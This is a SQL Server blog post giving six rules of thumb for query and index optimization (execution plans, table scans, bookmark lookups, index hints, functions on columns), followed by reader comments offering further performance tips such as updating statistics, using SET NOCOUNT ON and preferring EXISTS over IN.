Suppose (r̄*, σ*) is the minimum-variance point. Then we can go ahead and graph all pairs (r̄, σ) in the minimum-variance set satisfying r̄ ≥ r̄*. This set of pairs is called the efficient frontier and corresponds to what are called efficient portfolios. As r̄ increases, σ increases also: a higher rate of return involves higher risk. The efficient frontier traces out a nice increasing curve in the σ–r̄ plane; see Figure 6.1 of the Text, Page 157. We view the efficient frontier as corresponding to those portfolios considered by a rational investor.

When shorting is allowed, and there are at least two distinct values for r̄i (e.g., not all are the same), then the efficient frontier is unbounded from above: you can obtain as high an expected return as is desirable. (The problem, however, is that you do so with risk that tends to ∞.) To see that it is unbounded: select any two of the assets (say 1, 2) with different rates of return. Assume that r̄1 > r̄2. Invest only in these two, yielding r̄ = αr̄1 + (1 − α)r̄2 = α(r̄1 − r̄2) + r̄2. As α → ∞ so does r̄; any high rate is achievable no matter how large.
Notice that to do this, though, (1 − α) becomes negative and large; we must short increasing amounts of asset 2.

1.8 Generating the efficient frontier from only two portfolios

Let w1 = (α1¹, α2¹, ..., αn¹, λ1, μ1) be a solution to the Markowitz problem for a given expected rate of return r̄1, and w2 = (α1², α2², ..., αn², λ2, μ2) be a solution to the Markowitz problem for a different given expected rate of return r̄2. From the linearity of the solution, it is immediate
(the reader should verify) that for any number α, the new point αw1 + (1 − α)w2 is itself a solution to the Markowitz problem for expected rate of return αr̄1 + (1 − α)r̄2. Here,

αw1 = (αα1¹, αα2¹, ..., ααn¹, αλ1, αμ1),
(1 − α)w2 = ((1 − α)α1², (1 − α)α2², ..., (1 − α)αn², (1 − α)λ2, (1 − α)μ2),

and thus αw1 + (1 − α)w2 is of the form (α1, α2, ..., αn, λ, μ) with αi = ααi¹ + (1 − α)αi², λ = αλ1 + (1 − α)λ2, and μ = αμ1 + (1 − α)μ2. This new point (α1, α2, ..., αn, λ, μ) is a solution to the n + 2 linear equations following (16) for r̄ = αr̄1 + (1 − α)r̄2.

We conclude that knowing two distinct solutions allows us to generate a whole collection of new solutions, and hence a whole bunch of points on the efficient frontier. It turns out that the entire minimum-variance set can be generated from two such distinct solutions. In particular, one can generate the entire efficient frontier from any two distinct solutions. Treating each of the two fixed distinct solutions as portfolios, and hence as assets in their own right, we conclude that we can obtain any desired investment performance by investing in these two assets only. The idea is to think of each of these two assets as mutual funds as in Section 1.4, and create your investment by investing in these two funds only; we are back to the n = 2 case. If we imagine the entire asset marketplace as our potential investment opportunity, then we conclude that it suffices to invest in only two distinct (and excellent) mutual funds, in the sense that we can obtain any point on the efficient frontier by doing so.

1.9 Ruling out shorting

The Markowitz problem assumed shorting was allowed; but if shorting is not allowed, then the additional n constraints

αi ≥ 0,   i ∈ {1, 2, ..., n},

must be included as part of the "subject to". This complicates matters because now, instead of only equalities, there are inequalities among the constraints; the solution to this quadratic program is no longer obtained by simply inverting a matrix.
But the problem can be handled by using the methods of LP, where n additional Lagrange multipliers must be utilized, and the problem becomes one of finding a feasible region for an LP. This problem will be discussed later.
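For intuition, when n = 2 the no-shorting constraint simply restricts α to the interval [0, 1], so if the unconstrained optimum α* falls outside that interval, the constrained optimum sits on the boundary. A brute-force sketch with assumed illustrative numbers (not from the notes):

```python
def portfolio_var(a, s1, s2, cov):
    # f(a) = a^2 s1^2 + (1-a)^2 s2^2 + 2 a (1-a) cov, as in formula (6)
    return a * a * s1 * s1 + (1 - a) ** 2 * s2 * s2 + 2 * a * (1 - a) * cov

def min_var_no_short(s1, s2, cov, steps=10000):
    # Brute-force search of alpha over [0, 1], the no-shorting feasible set for n = 2.
    best = min((portfolio_var(i / steps, s1, s2, cov), i / steps)
               for i in range(steps + 1))
    return best[1]

# With rho > s2/s1 the unconstrained optimum would short asset 1 (alpha* < 0);
# the no-shorting optimum sits on the boundary alpha = 0 instead.
s1, s2, rho = 0.30, 0.10, 0.8
a = min_var_no_short(s1, s2, rho * s1 * s2)
print(a)
```

Here the search returns α = 0 (all money in the less risky asset), illustrating how the inequality constraints change the character of the solution compared with the matrix-inversion approach.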
6 years, 3 months ago.
Arduino + Mbed i2c?
Hello.
I am currently working on a project that requires me to send data from the mbed to the Arduino using I2C... Does anyone have an idea of how I can do this? This is what I have tried so far.
mbed master code
#include "mbed.h" Serial rn42(p9,p10); DigitalOut myled(LED1); I2C i2c (p28,p27); int x; int main() { rn42.baud(115200); while (1) { if (rn42.readable()) { x = rn42.getc(); printf("%d\n",x); myled = !myled; i2c.start(); i2c.write(0xC0); i2c.write(x); i2c.stop(); } } }
arduino slave code
#include <Wire.h>

byte y;

void setup() {
    Serial.begin(115200);
    Wire.begin(0xC0);
}

void loop() {
    Wire.onReceive(receiveEvent);
}

void receiveEvent(int howMany) {
    y = Wire.read();
    Serial.println(y);
}
Thank you very much.
2 Answers
1 year, 3 months ago.
Be aware that mBed i2c addresses are shifted 1 bit to the left. So if you use the I2C address 0x0F (00001111) on the arduino, it will be 0x1E (00011110) on mBed
3 years, 7 months ago.
I'm in the same boat. Arduino (Master) sending messages to mbed (slave or another master). Has this already been mastered?
Few emits in one slot
Hello,
I don't understand one thing. In my application I have to communicate over Modbus and compare values in variables; when certain conditions are met, events "happen". For now I'm using a thread for the Modbus communication, and I'm testing a draft of the main function.
My problem is: I would like to send at least two emits which run functions on the Modbus thread. Additionally, the main function is called cyclically by a timer (I want a fast refresh of the values from Modbus).
Now part of code:
#include "mainwindow.h" #include "ui_mainwindow.h" #include "settings.h" #include <QStatusBar> #include <QDebug> #include<QString> #include <QSqlQueryModel> #include <QFile> #include <QThread> #include "modbus.h" MainWindow::MainWindow(QWidget *parent) :QMainWindow(parent), ui(new Ui::MainWindow) { ui->setupUi(this); timer_1=new QTimer(this); timer_1->setInterval(2000); //Threads QThread* thread = new QThread; modbus* Modbus = new modbus; Modbus->moveToThread(thread); connect(this, SIGNAL (cyl_1_FF()), Modbus, SLOT (Cylinder_1_FF())); connect(this, SIGNAL(Read_1()),Modbus, SLOT(Read_1_value())); thread->start(); connect(timer_1,SIGNAL(timeout()),this,SLOT(Test_mode_1())); } void MainWindow::Test_mode_1(){ //Main function emit Read_1(); emit cyl_1_FF(); }
The problem is that when there is only one emit, it works. When there are two emits, neither of them works.
I've also tried the connection type Qt::BlockingQueuedConnection, but that doesn't work either.
- SGaist Lifetime Qt Champion last edited by
Hi and welcome to devnet,
Before starting to add threading to your application, you should check whether the asynchronous nature of Qt is not already enough to manage the data coming from modbus.
Then why do you need to have two different functions called one after the other ? Are you sure it's the correct design ?
Hello,
Then why do you need to have two different functions called one after the other ? Are you sure it's the correct design ?
This was just an example to start with. Normally it would be:
emit Read_1();
if (something) {
    emit cyl_1_FF();
    // other code
} else {
    emit cyl_1_RW();
    // other code
}
I'm testing the Modbus communication using QSerialPort. I had heard that when using a separate thread, the thread collects all its pending work on a queue and executes it one item at a time. But I see that is not true: those two signals are emitted almost at the same time, which makes a mess on the QSerialPort. I need some kind of communication switch.
- SGaist Lifetime Qt Champion last edited by
Well, your example shows that you seem to want to have a sequential blocking behaviour while using an asynchronous system. That doesn't seem right.
By the way, why not use the QSerialBus module which support modbus ?
@Narki1 said in Few emits in one slot:
no one works.
What does this mean? Does it crash? How are you debugging the problem?
Long story short – you can use SuppressIldasmAttribute attribute. However, please note that it won’t prevent decompilers (such as .NET Reflector, ILSpy or JustDecompile) from reverse engineering your code.
Here are the details:
What is IL?
Intermediate Language (IL) is CPU-independent instructions and any managed (.NET) code is compiled into IL during compile time. This IL code then compiles into CPU-specific code during runtime, mostly by Just InTime (JIT) compiler.
What is ILDASM?
ILDASM is a tool installed by Visual Studio or the .NET SDK; it takes a managed DLL or EXE and produces the IL code as human-readable clear text.
How to get IL code from an assembly
For example, consider the following code:
using System;
using System.Text;
namespace HelloWorld
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("Hello world...");
}
}
}
Put this code in a console project and build it, you will have an EXE file.
Then open a Visual Studio Command Prompt and type ILDASM and press enter. ILDASM should be opened. Open the EXE file you build from the code above in the ILDASM. You should see something like below:
If you double click on Main : void(string[]) then you can get the IL code of the Main method:
So, how can I prevent ILDASM from disassembling an assembly?
.NET has an attribute called SuppressIldasmAttribute which prevents disassembling the code. For example, consider the following code:
using System;
using System.Text;
using System.Runtime.CompilerServices;
[assembly: SuppressIldasmAttribute()]
namespace HelloWorld
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("Hello world...");
}
}
}
As you can see, there are just two differences:
1) We have added a System.Runtime.CompilerServices namespace declaration.
2) We have added [assembly: SuppressIldasmAttribute()] attribute.
After building the application in Visual Studio, when we try to open the resulting EXE file in ILDASM, now we get the following message:
Does SuppressIldasmAttribute prevents my code to be decompiled using decompilers?
No. Decompilers are using System.Reflection namespaces and classes to decompile the code and It is not possible to secure your code using that attribute. Your only option is to use obfuscators to scramble your code although scrambling will only produce code which is more difficult to read and understand.
References
MSIL Disassembler (Ildasm.exe)
SuppressIldasmAttribute Class
--
AMB
so what?! reflector, ida-pro and lots of others don't care about it!
don't waste your time.
anon, ida-pro and others know nothing about IL. So I think it worth some time at less to make some pain in the butt for hruckers 😉
Hmm so what if the 'string "SuppressIldasm" in ildasm.exe somehow got slighly damaged by something like a Hexeditor?
I mean things like this happens really quickly on some devel-opers machine.
Compiling, decompiling, hunting & smashing nasty 'bugs' from .NET stuff.
;^) | https://blogs.msdn.microsoft.com/amb/2011/05/27/how-to-prevent-ildasm-from-disassembling-my-net-code/ | CC-MAIN-2019-43 | refinedweb | 463 | 59.4 |
struts - Struts
struts get records in Tabular format How do i get result in tabular format using JSP in struts have already define path in web.xml
i m sending --
ActionServlet...
/WEB-INF/struts-config.xml
for later use in in any other jsp or servlet(action class) until session exist... in struts?
please it,s urgent........... session tracking? you mean session management?
we can maintain using class HttpSession.
the code follows
How do I compile the registration form?
How do I compile the registration form? How do I compile the registration form as stated at the bottom of the following page (URL is below). Do I...://
Struts - JDBC
struts-taglib.jar I am not able to locate the struts-taglib.jar in downloaded struts file. Why? Do i need to download it again
Reg struts - Struts
Reg struts Hi, Iam having Booksearch.jsp, BooksearchForm.java,BooksearchAction.java. I compiled java files successfully. In struts-config.xml Is this correct? I would like to know how do i have to make action 2
Struts 2 we can extend DispatchAction class to implement a common session validation in struts 1.x. how to do the same in the struts2
Struts Project Planning - Struts
Struts Project Planning Hi all,
I am creating a struts application.
Please suggest me following queries i have.
how do i decide how many... should i create those classes which are as table in database??
and how i do... the version of struts is used struts1/struts 2.
Thanks
Hi!
I am using struts 2 for work.
Thanks. Hi friend,
Please visit
java - Struts
java Hai friend,
How to desing Employee form in Struts?
And how the database connections will be do in the struts?
please forward answers as early as possible.
Thank you
File Upload in Struts.
File Upload in Struts. How to do File Upload in Struts
DAO in Struts
DAO in Struts Can Roseindia provide a simple tutorial for implementation of
DAO with struts 1.2?
I a link already exits plz do tell me.
Thank 2
Struts 2 I am just new to struts 2 and need to do the task.
I have a requirement like this :
when i click on link like Customer... will have two buttons like add and edit and a data grid will have the radio
Understanding Struts - Struts
Understanding Struts Hello,
Please I need your help on how I can understand Strut completely. I am working on a complex application which is built with Strut framework and I need to customize this application but I do
multiple configurstion file in struts - Struts
the solution.
I have three configuration file as 'struts-config.xml','struts-module.xml' and 'struts-comp.xml'.I have three jsp pages as 'index1.jsp','index2.jsp...
the the controll will move to three different Action class which are maintained
I wanted do develop mini application With server request and tesponse
I wanted do develop mini application With server request and tesponse I m planning to develop the mini webapplication using struts 1.2.9... to design GUI using struts 1.2.9 and how could be it will take server request
Exception Handling in Struts.
Exception Handling in Struts. How you can do Exception Handling in Struts="
show, hide, disable components on a page with struts - Struts
show, hide, disable components on a page with struts disabling a textbox in struts.. in HTML its like disable="true/false" how can we do it in struts
config
/WEB-INF/struts-config.xml
1
action
*.do
Thanks...!
struts-config.xml... class LoginAction extends Action
{
public ActionForward execute
Using radio button in struts - Struts
, but the radio button has only just one value that i can pass.what can i do to solve... source code to solve the problem :
For more information on radio in Struts
struts validation
struts validation I want to apply validation on my program.But i am failure to do that.I have followed all the rules for validation still I am...;%@ include file="../common/header.jsp"%>
<%@ taglib uri="/WEB-INF/struts
i am Getting Some errors in Struts - Struts
i am Getting Some errors in Struts I am Learning Struts Basics,I am Trying examples do in this Site Examples.i am getting lot of errors.Please Help me
the Struts if being used in commercial purpose.
the Struts if being used in commercial purpose. Do we need to pay the Struts if being used in commercial purpose
you get a password field in struts
you get a password field in struts How do you get a password field in struts
java struts - Java Beginners
java struts i want to do the project in the struts.... how i can configure the project in my eclipse... can u help me in this issues
help - Struts
com.opensymphony.xwork2.ActionSupport;
public class HelloWorld extends...
Hi friend,
Do Some changes in struts.xml
Configuring Struts DataSource Manager on Tomcat 5
directory. Add the servlet API into class path. Then open dos prompt and
navigate...-config.xml
Now add the following action mapping into the struts-config.xml...
Configuring Struts DataSource Manager on Tomcat 5
do the following
do the following write a program to enter the string and do the following
1- count totle number of vowel
2- replace vowel
3- delete the charactor from given value
4- riverce the string
5- convert second word in upercase
6
servlet action not available - Struts
servlet action not available hi
i am new to struts and i am getting the error "servlet action not available".why it is displaying this error...
config
/WEB-INF/struts-config.xml
2
action
*.do
how to do this?
how to do this?
Given any integer 2D array, design then implement a Java program that will add to each element in the array the corresponding column number and the corresponding row number. Then, it prints the array before
STRUTS MAIN DIFFERENCES BETWEEN STRUTS 1 AND STRUTS 2
Struts
Struts How to retrive data from database by using Struts
Struts
Struts how to learn struts
STRUTS
STRUTS Request context in struts?
SendRedirect () and forward how to configure in struts-config.xml
Java Example projects about STRUTS
no job in my hands.
But i do some small projects about STRUTS.
Please send me some example projects about STRUTS.
Please visit the following link:
Struts 2 Interceptors
Struts 2 Interceptors
Struts 2 framework relies upon Interceptors to do most... part of Struts 2
default stack and are executed in a specific order...-action basis and add it to the already
existing Interceptors in the framework
Multiple file upload - Struts
only with servlets and i m using struts.
I have this implemeted in servlets but now i have to do this with struts.
In this "items = upload.parseRequest... using struts and jsp.
I m using enctype="multipart". and the number of files
Struts 2 + Ajax
Struts 2 + Ajax hi ,
i am new in java ,i need a help
I am setting... which contain a path of pdf i.e (c:\demo.pdf) which i want to display in jsp without refreshing.
can anyone tell me the ajax code to
The server encountered internal error() - Struts
file I use the following code.
Do I need to add something about that uri... the problem in struts application.
Here is my web.xml
MYAPP...
org.apache.struts.action.ActionServlet
config
/WEB-INF Tell me good struts manual
plese tell -Struts or Spring - Spring
about spring.
which frameork i should do Struts or Spring and which version.
i also want to do hibernate.
please guide.
thanks. Hi Friend...plese tell -Struts or Spring Hello,
i want to study a framework
struts dropdown list
struts dropdown list In strtus how to set the dropdown list values... page using struts ?
please send me jsp code...
sample code:
**Action Class:-**
ArrayList<DropDownVO> masterList = null;
masterList Training
. The basic platform requirements are Servlet API 2.4, JSP API 2.0 and Java 5...
Struts 2 Training
The Struts 2 Training for developing enterprise applications with Struts 2 framework.
Course
autocall for sturts action class - Struts
a web application with struts frame work. In this project I have to call an action class on startup of the application. i.e. when ever I run my application in the server on action class should run automatically. how can I do this. help me UI - Struts
Struts2 UI Can you please provide me with some examples of how to do a multi-column layout in JSP (using STRUTS2) ? Thanks | http://www.roseindia.net/tutorialhelp/comment/11853 | CC-MAIN-2015-14 | refinedweb | 1,421 | 66.84 |
FormatConversionBean arrives in CPI!
Update 3 Oct 2018: Added Excel converters
Introduction
If you have worked on SAP PI over the past few years, there is a possibility that you may have come across FormatConversionBean – One Bean to rule them all! It is an open source project I developed, providing various format conversion functionalities (complementing SAP’s offering) packaged in a custom PI adapter module.
Although CPI provides similar capabilities, some of its converters lack customising options for more complex scenarios.
The good news is – FormatConversionBean is now available in CPI! Over the past weeks, I’ve began porting over the development to fit into CPI’s Camel-based framework, and the bulk of functionality is now ready to be used.
Converters
The following table lists the converters that are available as part of FormatConversionBean in CPI. The reference link for each converter provides more details on the available configuration options/parameters.
Note: The converter classes are in a different package (com.equalize.converter.core) compared to their PI counterparts.
Usage in Integration Flow
Due to differences between the nature of the design of integration flows in CPI compared to PI, the approach of using it can be summarised in the following steps.
1) Upload JAR file
2) Configure parameters (via Content Modifier or script)
3) Add Groovy script
Below is a sample integration flow utilising FormatConversionBean.
Further details of each step are as follows:-
Step 1 – Upload JAR file
i) Download latest release of converter-core-x.x.x.jar from GitHub repository.
ii) Use Resources view to upload JAR file as an Archive into Integration Flow.
Note: To use the Excel converters, the following Apache POI 3.17 libraries need to be uploaded into the Integration Flow as well.
- poi-3.17.jar
- poi-ooxml-3.17.jar
- poi-ooxml-schemas-3.17.jar
- xmlbeans-2.6.0.jar
- commons-collections4-4.1.jar
Step 2 – Configure parameters
Parameters are passed into FormatConversionBean using Exchange Properties. These can be configured via Content Modifier (sample below) or Script (Groovy or Javascript). Refer to each converter’s blog post for details on available parameters.
Step 3 – Add Groovy script
This is the entry point for the execution of FormatConversionBean. Add a Groovy script step in the Integration Flow with the following code. }
That’s it! It is as simple as that! 🙂
Source Code, Enhancements & Collaboration
The source code for FormatConversionBean is hosted at the following GitHub repository.
It is a Maven-based project with the following attributes:
Anyone and everyone is welcome to fork/clone the repository to further enhance privately or collaborate publicly on this project.
More details utilising Eclipse/Maven to develop and build the project to follow in a future blog post.
Bugs & Feature Requests
If you encounter any bugs or would like to request for a particular feature, the preferred approach is to raise an issue at the following GitHub repository.
This provides a better avenue to track, communicate and collaborate on the issue instead of the comment section of this blog post.
That's a great news and thanks a lot for publishing. Hopefully this makes the developer job easy when it comes to nested/deeper structure conversions.
Hi Naresh
Thanks for your comment. Yes, that is the whole intention - this should hopefully provide an alternative if the standard converters do not meet the integration requirement.
Regards
Eng Swee
Hi Eng Swee,
I have encrypted .XLSX.PGP file in application server, how to decrypt the XLSX file and move to directory using sender SFTP adapter?
Regards,
Nagesh
That's excellent news! I've been using your bean in lots of integration scenario's. I'm really looking forward to use this version in the CPI project I'm currently working on.
Hi Iddo
Thanks for your comment. It's great to hear from someone who has been using the PI version of this in real integration scenarios - I rarely get much feedback on how it is doing out there unless someone hits an issue!
In terms of functionality, not much has changed since the last PI version release, but I do hope to be able to work on enhancing this CPI version further once I complete the whole port (Excel converters coming soon).
Would love to hear from you how this CPI version gets along, so do write back 😉
Regards
Eng Swee
Hi Eng Swee,
I can tell you that I successfully implemented your conversion bean in a CPI scenario where the standard SAP XML-JSON and JSON-XML conversion wasn't capable enough. Something to do with invalid characters in the JSON field names.
Awesome work!
Iddo
Hi Iddo
Thanks for writing back. Real glad to hear that it worked well for your scenario!
Regards
Eng Swee
Wow, that is welcome news indeed, I will almost be sorry to see my somewhat messy workarounds go 🙂
Regards
Tom
Let me know how it goes if you get around to replacing them with this 😉
I just tried out the scenario XML to flatfile with fixed field lengths, it works like a charm!
It must be said that I do not have a deep structure, I have a flat but diverse structure.
The xml structure consists of a root node with 7 different record types below it at the same level. Each record type can occur multiple times, like this:
As the go-live date of the solution is somewhere this week, I guess I won't replace it.
it would have saved me a week of work on the workaround 🙂
Also the excel conversion is interesting, I'm going to test that as well..
Thanks!
Glad to hear it is working 🙂
Yes, it does work with with simple/flat structures as well as deep ones too. Historically, PI already had standard functionality to handle simple/flat structures, so FormatConversionBean was to cater for the deep ones. For CPI, the CSV<>XML converters are still quite basic, so FormatConversionBean can possibly cater for more use cases.
Haven't been able to get the XmltoExcel conversion working.
It produces some sort of an xlsx, there is no error in CPI, but when I look inside the generated file it seems to be empty.
I kept my parameters to a minimum:
Hi Tom
Maybe something to do with the input XML content. Try checking the following blog and see if you can reproduce the XLSX output with the same input XML.
Unlike the Flat file converter, the Excel converter only caters for simple XML structures, i.e. just one type of segment.
If it still doesn't work, please open an issue on the GitHub repository (details in the blog part above), and attach a copy of the input XML file.
Regards
Eng Swee
These features are really developer friendly. Can't wait to try it in my next assignment.
Thanks for summarizing it.
Regards,
Varinder
Hi Engg Swee Yeoh,
I have tried implementing it in CPI but I am getting below error:
java.lang.Exception: java.lang.ClassNotFoundException: com.equalize.converter.core is an invalid converter class@ line 23 in script1.groovy
I have already uploaded the latest JAR converter-core-1.1.0 as Archive in Resource.
I am missing any step?
Regards,
Rutuja Thakre
Hi Rutuja
Thanks for your interest in this.
The error is because the value com.equalize.converter.core in property converterClass is incomplete. You need to refer to each converter's blog post to get the correct value, e.g. com.equalize.converter.core.XML2JSONConverter.
I think the screenshot on step 2 might have been a bit misleading as the value is truncated in the UI - I have modified the screenshot now to show an example of the full value that should be in the property.
Regards
Eng Swee
Hi Eng Swee,
Thanks for your quick reply.
I have made the changes in converterClass and its working fine now.
Great Work.
Regards,
Rutuja Thakre
First of all, thanks for all the work you put in here.
For whatever reasn I seem to be unable to make use of the XLS2XML conversion. I get a java.lang.reflect.MalformedParameterizedTypeException whenver I add the documentNamespace parameter in the "set parameter" step. I tried my own namespace, but also the one mentioned in your post (urn:equalize:com) both in paranthesis as well as without, I also tried simple once like urn:ns0 but I seem to be unable to figure it out.
Could you pls. provide a screenshot how exactly it should be specified?
Thx.
Joern
Hi Joern
Looks like for some reason, the latest 1.3.0 release is having this MalformedParameterizedTypeException issue in other users' tenant despite it working perfectly well on mine.
I will have to release a new version to reverse the changes.
In the meantime, please use version 1.2.0 - it should work fine. Let me know how it goes.
Regards
Eng Swee
Hi Eng
Thanks for the help, acually I tried 1.2.0 but when it errored I saw you published a version 1.3.1, and that works perfectly for me.
I guess I did something wrong with he 1.2.0 install, but as I have to hurry with my prototype, I will need to leave it at 1.3.1 for now. Once I find the time I will come back and analyze the 1.2.0 problem.
Again, thx for all the efoort you put in here.
KR
Jörn
Glad to hear that 1.3.1 worked well for you, Joern.
Do let me know if you fine any other issues with it, and also if you do happen to try 1.2.0 and hit some other issue.
Hope your prototype goes well.
Hi Eng Swee,
Thank you for getting the bean on to CPI.
I have a quick question reg deep flat file to xml. Can we convert a flat idoc to idoc xml using this bean? is it supported?
Thanks,
Vijaya Palla
You can try, but I would imagine it would be quite complex considering how complex an IDoc structure is - be it the flat representation or the XML. No guarantee it will work.
True, but does this actually confused me.
how will my record structure understand that Items1 and Items2 are at the same level, if I specify it as Order,Items1,Items2?
<Order>
<Items1>
</Items1>
<Items2>
</Items2>
</Order>
I would try using the parent parameter. I would keep you posted on how it works.
Thanks,
Vijaya Palla
Hello Eng Swee Yeoh, @engswee.yeoh
This is excellent work! Thank you so much.
I am trying to use the XML2DeepPlainConverter in CPI. I have downloaded converter-core-2.1.0.jar version and uploaded it into CPI. I have even tested my scenario with an the older version 1.2 to see if it made a difference, but there was no difference. I am getting the following error in the groovy script.
java.lang.NullPointerException
My input message is below:
<header1>
<hdrconstant1>header desc 1</hdrconstant1>
<header2>
<hdrconstant2>header desc 2</hdrconstant2>
</header2>
<details>
<num>00000001</num>
<date>20190906</date>
<acctnumber>1234567891</acctnumber>
<code>00</code>
<amount>10.0</amount>
<name>DIESEL</name>
</details>
<details>
<num>00000002</num>
<date>20190906</date>
<acctnumber>1234567892</acctnumber>
<code>00</code>
<amount>20.0</amount>
<name>DIESEL</name>
</details>
<trailer>
<trlconstant1>test</trlconstant1>
<counter>2</counter>
<trlconstant2> </trlconstant2>
<totalamount>30.0</totalamount>
</trailer>
</header1>
Here is my groovy script:
}
I have attached a copy of my content modifer.
Please help me solve this issue!
Thank you,
Rhonda
Hello, I apologize. My issue has been solved. I had named the groovy script with extension ".GROOVY" instead of ".groovy". It must be lowercase.
Thank you again @engswee.yeoh for your great work!!!
Rhonda
Hello @engswee.yeoh
Thanks for such a great explanatory post.
I have tried using the XmltoExcel conversion feature in CPI following both of your blogs.
I have downloaded the required jar files from gitHub and uploaded into the CPI Iflow. I am using the same groovy script as shown here.
It produces some sort of a distorted output although there is no error in CPI.
I have attached the screenshots of my content modifer, resources & output over here.
Can you please help me in understanding the anomaly? Am I missing any step?
The output generated is binary data, so you won't be able to view it in textual format on the browser.
Hello @engswee.yeoh
I am trying to use Excel2XMLConverter in CPI.
But am facing below error: (Please suggest, if there any further configs required)
"org.apache.camel.CamelExecutionException: Exception occurred during execution on the exchange: cause: java.lang.ClassNotFoundException: org.apache.commons.math3.util.ArithmeticUtils"
My configuration As below:
Need few inputs here.
Thank you again @engswee.yeoh
My issue resolved after importing "commons-math3-x.x.x.jar".
Nice blog. Are you aware of any script that can convert and HTML table to XML/CSV/JSON? We are on CPI. The javascripts I found in the web is mainly meant to be run inside a htm page. It is using document.querySelectorAll as the parser which doesn't work in CPI. Is there a way to store the html table we receive in the message body as a real html file somewhere in CPI and thus we can call the document.querySelectorAll?
Thanks Jonathan.
Thanks Eng Swee for this excellent blog.
Cheers Eng Swee,
Took two minutes to setup and easily generate a file for some users to consume due to a multi-ERP environment, which leads to some difficulty for them. As a side note from the last time I commented on a blog of yours... CPI is growing on me and I find the camel model super flexible for object reuse (outside of not allowing cross package references yet). The partner directory API is super handy and despite not using it yet because we just got CPI it's going to help a lot. Taking a little time to internalize some of the notations and things but it's coming along 🙂
Regards,
Ryan Crosby
Hi Ryan, glad to know you got this up and running without much trouble 🙂 And good to know that CPI is growing on you... One day, you may look back and never want to touch PI/PO again 😝
Hi Eng Swee,
Oh I'm already there in regards to skipping out on PI/PO, although, I may still have an inkling for using the graphical mapping based tools for that portion when required. The nice thing is the system is empty from the start, so I'm not carrying forward a ton of legacy content that is crumbling and held together with a combination of duct tape, staples, and bungee cords. Already have two productive scenarios with some object reuse in the first week - I configured the TMS last week after trying to find blog content that explained the process (well enough 😝). That's my one knock, is that like many things in SAP you only get the "Hello World" help documentation, which isn't suitable for real world scenarios.
Regards,
Ryan Crosby | https://blogs.sap.com/2018/09/04/formatconversionbean-arrives-in-cpi/ | CC-MAIN-2021-43 | refinedweb | 2,521 | 65.52 |
There expensive part of whole execution plan.
Rule # 2 : Table scan or clustered index scan needs to be optimized to table seek (if your table is small it does not matter and table scan gives you better result). Table scan happens when index are ignored while retrieving the data or index does not exist at all.
Rule # 3 : Bookmark lookup are not good as it means correct index is not being used or index is not sufficient for all the necessary data to retrieve. The solution of bookmark lookup is to create covering index. Covering index will cover all the necessary columns which needs to improve performance of the query. It may be possible that covering index is slower. Try and Error is good method to find the right match for your need.
Rule # 4 : Experiment with Index hints. In most cases database engines picks up the best index for the query. While determining which index is best for the query, database engine has to make certain assumption for few of the database parameters (like IO cost etc). It may be possible database engine is recommending incorrect index for query to execute. I usually try with few of my own indexes and test if database engine is picking up most efficient index for queries to run. I use Index Hint for this purpose.
Rule # 5 : Avoid functions on columns. If you use any functions on column which is retrieved or used in join or used in where condition, it does not take benefit of index. If I have situation like this, I usually create separate column and populate it ahead of time using simple update query with the value which my function will return. I put index on this new column and this way performance is increased. Creating indexed view is good option too.
Rule # 6 : Do not rely on execution plan only. I understand that this contradicts the Rule # 1, however execution plan is not the only benchmark for indexes. There may be cases that something looks less expensive on execution plan but in real world it takes more time to get data. Test your indexes on different benchmarks.
Rule # 7 : ___________________________________________
Let me know what should be the Rule # 7.
Reference : Pinal Dave ()
#7 — Better to have a THIN Index over FAT Index. If Index is on BIG Varchar column see if those can be substituted to INT column
My Rule # 7 would be: Ensure there aren’t missing or outdated statistics
—
Luciano Evaristo Guerche (Gorše)
Taboão da Serra, SP, Brazil
Rule # 7 : Avoid SP names that begin with sp_
Rule # 8 : Use SET NOCOUNT ON, where ever possible
A lot depends on the usage of the DB – if low data updates and high volume of queries, create a covering index for the most highly used queries since data can be obtainied directly from the index and no lookup to the data table needs to be done.
If possible, store indexes on a separate drive than from the data files.
Well Query Optimizations rules are not limited.
It depends on business needs as well,
For example we always suggest to have a relationship between tables but if they are heavily used for Update insert delete, I personally don’t recommended coz it will effect performance as I mentioned it all depends on Business needs;
Here are few more tips I hope will help you to understand.
One: only “tune” SQL after code is confirmed as working correctly.
(use top (sqlServer) and LIMIT to limit the number of results where appropriate,
SELECT top 10 jim,sue,avril FROM dbo.names )
Two: ensure repeated SQL statements are written absolutely identically to facilate efficient reuse: re-parsing can often be avoided for each subsequent use.
Three: code the query as simply as possible i.e. no unnecessary columns are selected, no unnecessary GROUP BY or ORDER BY.
Four: it is the same or faster to SELECT by actual column name(s). The larger the table the more likely the savings.
Five: do not perform operations on DB objects referenced in the WHERE clause:
Six: avoid a HAVING clause in SELECT statements – it only filters selected rows after all the rows have been returned. Use HAVING only when summary operations applied to columns will be restricted by the clause. A WHERE clause may be more efficient.
Seven: when writing a sub-query (a SELECT statement within the WHERE or HAVING clause of another SQL statement):
— use a correlated (refers to at least one value from the outer query) sub-query when the return is relatively small and/or other criteria are efficient i.e. if the tables within the sub-query have efficient indexes.
— use a noncorrelated (does not refer to the outer query) sub-query when dealing with large tables from which you expect a large return (many rows) and/or if the tables within the sub-query do not have efficient indexes.
— ensure that multiple sub-queries are in the most efficient order.
— remember that rewriting a sub-query as a join can sometimes increase efficiency.
Eight: minimize the number of table lookups especially if there are sub-query SELECTs or multicolumn UPDATEs.
Nine: when doing multiple table joins consider the benefits/costs for each of EXISTS, IN, and table joins. Depending on your data one or another may be faster.
‘IN is usually the slowest’.
Note: when most of the filter criteria are in the sub-query IN may be more efficient; when most of the filter criteria are in the parent-query EXISTS may be more efficient.
Ten: where possible use EXISTS rather than DISTINCT.
Praveen Barath
Pingback: SQL SERVER - Optimization Rules of Thumb - Best Practices - Reader’s Article Journey to SQL Authority with Pinal Dave
Remember that many performance problems cannot be reproduced in your development environment, and examining the issue in the production environment is essential. When users report a performance problem, use SQL Server Profiler to insure you are attempting to optimize the correct procedure, and determne exactly how much time and resources it is comsuming. This can later be used a benchmark to measure how much improvement (if any) your attempts at performance optimization have made.
Also, if users report that a database operation, which normally runs within an acceptable amount of time, will sporatically run for significantly longer, use sp_who2 or server traces to determine if process blocking is at the root of the problem and then what conditions (available memory, another process that competes for the same resources, etc.) contribute to the blocking.
Rule #7 use set statistics io,time on in order to get scan count, logical reads etc
